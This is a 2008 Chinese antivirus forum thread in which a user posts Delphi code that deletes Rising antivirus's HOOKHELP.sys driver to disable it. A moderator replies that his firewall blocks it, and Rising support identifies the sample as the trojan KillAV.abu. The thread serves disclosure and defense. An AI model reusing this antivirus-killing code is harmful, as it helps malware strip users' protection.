1   1  /  1  页   跳转

干掉瑞星的工具

收藏
wjzdw
头像
特邀体验者
  • 帖子:357
  • 注册: 2007-02-24
  • 来自:
论坛8周年活动礼物
发表于: 2008-08-08 17:56 | 只看楼主 短消息 资料
字号: 1楼

干掉瑞星的工具

据说可以kill RISING


版主给看看  瑞星是否能够如何防范


关键代码:
function Deleterising:boolean;
var
Wdir : pChar;
Stmp,RisHookPath:string;
Hfile:THandle;
begin
result:=false;
Getmem(wdir,255);
GetSystemDirectory(Wdir, 255); //得到系统System32的目录
Stmp:=pchar(wdir);
if (Stmp[length(Stmp)]<>'\') then Stmp:=Stmp+'\';
RisHookPath:=Stmp+'drivers\HOOKHELP.sys';//得到瑞星的底层HOOK驱动文件的路径
//showmessage(RisHookPath);
Try
Hfile:=CreateFile(PCHAR(RisHookPath),GENERIC_READ,FILE_SHARE_READ,nil,OPEN_EXISTING,FILE_FLAG_DELETE_ON_CLOSE,0);//其中FILE_FLAG_DELETE_ON_CLOSE参数的含义是系统重启后删除文件
closehandle(hfile);
result:=true;
except
end;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
if Deleterising then
begin
showmessage('删除文件成功,请重启系统!');
end;
end;
end.
【转自黑防】





用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; TheWorld)

附件附件:

您所在的用户组无法下载或查看附件

一见钟情,再而衰,三而竭。
分享到:
gototop
 
baohe
头像
大版主
  • 帖子:72569
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2008-08-08 22:54 | 短消息 资料
字号: 2楼

回复 1F wjzdw 的帖子

过不了我的Tiny,就别想删除瑞星。打开HOOKHELP.SYS,成功没成功都判断不了,就号称删除瑞星了?汗!


 附件: 您所在的用户组无法下载或查看附件


重启就重启!谁怕谁呀?!切!



 附件: 您所在的用户组无法下载或查看附件
最后编辑baohe 最后编辑于 2008-08-08 22:57:10
gototop
 
RisingCSC
头像
在线技术支持工程师
  • 帖子:4368
  • 注册: 2008-02-26
  • 来自:
发表于: 2008-08-13 14:19 | 短消息 资料
字号: 3楼

回复:干掉瑞星的工具

文件名:kill rising.exe
病毒名:Trojan.Win32.KillAV.abu


您所上报的病毒文件将在瑞星2008的20.57.20版本中处理解决,如遇特殊情况可能会推后几个版本。
站内导航:
新人报道  |  反病毒/反流氓软件  |  RAV/RIS求助  |  RFW求助  |  卡卡助手求助
热点推荐:
RIS2009有奖征文  |  春节活动汇总
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT